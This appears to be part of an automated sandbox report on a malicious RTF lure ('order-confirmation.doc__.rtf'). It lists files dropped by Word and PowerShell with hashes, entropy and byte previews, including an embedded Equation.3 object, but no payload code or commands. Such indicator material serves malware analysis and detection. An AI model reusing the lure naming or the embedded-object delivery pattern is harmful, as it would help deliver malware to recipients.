                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{AB5F6AD7-3C7C-4823-93B4-8E22DB7DEE25}.tmp
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1536
                                                      Entropy (8bit):1.9135740244905386
                                                      Encrypted:false
                                                      SSDEEP:12:qNjqawzFgC1693UlhaUIrKMCXIHvk5uFJizbuvq2ZA:qZnwzFqasUIPs50MzbunA
                                                      MD5:173BD29F37AF517A6E5FB84E32DFAADC
                                                      SHA1:47AD5540D17134DF10505ADC1D530EE922260575
                                                      SHA-256:793781237510EF04EB575C68615DF138D28E1954BF4246EF04335AE518C64D24
                                                      SHA-512:54135AD4AA7F4112A90D30F259A11B17DF7AD10B1C4F4AE1F0D8A48D43D5FA5FBA4BA52AECA502E2A7EA58A40FAC0FF6F6AE1CFBE345B4AE041FE2A89A4A0916
                                                      Malicious:false
                                                      Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7.4.0.8.0.9.2.3. . . . . . . . . . . . . . . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .n.B.m.g.5.1.S.K.P.W.n.2.K.o.y.c.U.n.r.k.x._.m.Y.4.Y.g.U.d.w.U.J.f.a.b.A.k.W.N.I.H.R.L.O.F.9.h.D.M.J.x.X.N.V.t.H.d.V.p.s.v.k. . .1.8.0.3.3.4.2.6.5.1.8.0.3.3.4.2.6.5._.T.V.P.A.J.T.S.K.L.Y.E.F.p.h.q.l.s.h.a.h.h.l.d.j.b.l.o.f.y.d.n.e.k.a.l.t.q.r.r.r.j.h.u.y.e.k.b.m.r.m.g.W.K.L.Q.Q.Y.G.B.D.I.O.B.V.O.L.B.Y.0.6.3.3.0.6.6.1.6.1.6.8.9.8.3.9.4.5.2.8.9.6.8.0.7.0.6.4.8.2.9.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.................................................................................................................................................................................................................................................................................................................................................................................................
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):112
                                                      Entropy (8bit):4.396946248094323
                                                      Encrypted:false
                                                      SSDEEP:3:HBjCL8IdrFoSmaCL8IdrFomxWBjCL8IdrFov:HBjE3YaE3yjE3y
                                                      MD5:80F98775AEC3A1D057B0E97BB92C6BA4
                                                      SHA1:A5628EC89AAD766D79CAD486639FA9D6C967DABB
                                                      SHA-256:86CBC2754A828A97C1E42C1D22601F1C375C2F13452838376A3B03F0AB65FD2F
                                                      SHA-512:4DBC0EA48E99F1486ED0052D0E586EA366B6A8A2E5D2E8EFA9E0DD2993A188824AE3D6DD783EF2CEFC655EF54864A27D63A31E1B915BCB931223B3BE03B00729
                                                      Malicious:false
                                                      Preview: [misc]..order-confirmation.doc__.LNK=0..order-confirmation.doc__.LNK=0..[misc]..order-confirmation.doc__.LNK=0..
                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order-confirmation.doc__.LNK
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Fri May 28 03:42:34 2021, length=5082, window=hide
                                                      Category:dropped
                                                      Size (bytes):2168
                                                      Entropy (8bit):4.572006912903714
                                                      Encrypted:false
                                                      SSDEEP:48:8ZKQ/XT0jF/Wr1qQh2ZKQ/XT0jF/Wr1qQ/:8//XojFOrAQh2//XojFOrAQ/
                                                      MD5:D792CA7FB33ABFEF36C43AEE6059311C
                                                      SHA1:7F07091E89F0C19FF7F32FD386858B2BA27583B7
                                                      SHA-256:FC6B467F21CCA100460352D0CC8B27F9A7AF8F1A0E1094A26E9221EA109CE586
                                                      SHA-512:9B52E9D772CB1015EBEF7AA891EF3C0382E09923CC37C560D32EE00C14EBED0E10BE4A1C76D23D8ECC77734CA3B3A9C24749FC00DFA9D09F8A4A2365D19C4BD3
                                                      Malicious:false
                                                      Preview: L..................F.... ....B{..{...B{..{.....{S...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2......RR% .ORDER-~1.RTF..f.......Q.y.Q.y*...8.....................o.r.d.e.r.-.c.o.n.f.i.r.m.a.t.i.o.n...d.o.c._._...r.t.f.......................-...8...[............?J......C:\Users\..#...................\\128757\Users.user\Desktop\order-confirmation.doc__.rtf.3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.o.r.d.e.r.-.c.o.n.f.i.r.m.a.t.i.o.n...d.o.c._._...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......
                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.431160061181642
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                      MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                      SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                      SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                      SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                      Malicious:false
                                                      Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3H2G1IAAUMKMPNEXTVFM.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3LZ81X2WO8Z9V4R143KY.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8V1J5S45YAFZD613NLCB.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CUZDEROSP3A3HJR1FH0T.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CY3GXMNVEU96V3BNZTOS.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DVROMKYKWOGS9EVSGTXB.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MTIT9GYF9MZ1HM1KM5FW.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NDI8VKN5ESJ660RZK00L.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\P9R3KU5MPRTPH7Q7M1WD.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PGNXWFDP5X4DDXK3RORU.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
                                                      Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PJ6YPGRV1GD8PTQL9LFV.temp
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8016
                                                      Entropy (8bit):3.586858592886363
                                                      Encrypted:false
                                                      SSDEEP:96:chQCsMqWqvsqvJCwoVAz8hQCsMqWqvsEHyqvJCworLAzg1Kr5HiAZqOolUVnAIu:cynoVAz8yLHnorLAzgUQAZqOrAIu
                                                      MD5:F170C2238CC33BAB260579768D7E5989
                                                      SHA1:4994E15EF13B4A9FC561AB5AC793008ECF51AE20
                                                      SHA-256:57BAF4F1C5F80EA1D342D499D93F83E902254F99D5FB13674A8A5A3FEFC87735
                                                      SHA-512:5B76012688A6060D6B77B812328B8B0BEF23FFB9BB04D56AC40C9619445FDEF30388C92E79FDB62E685075591C0D1AB8C75BE2D18B2FA400A422E5A56A7B3BBA
                                                      Malicious:false
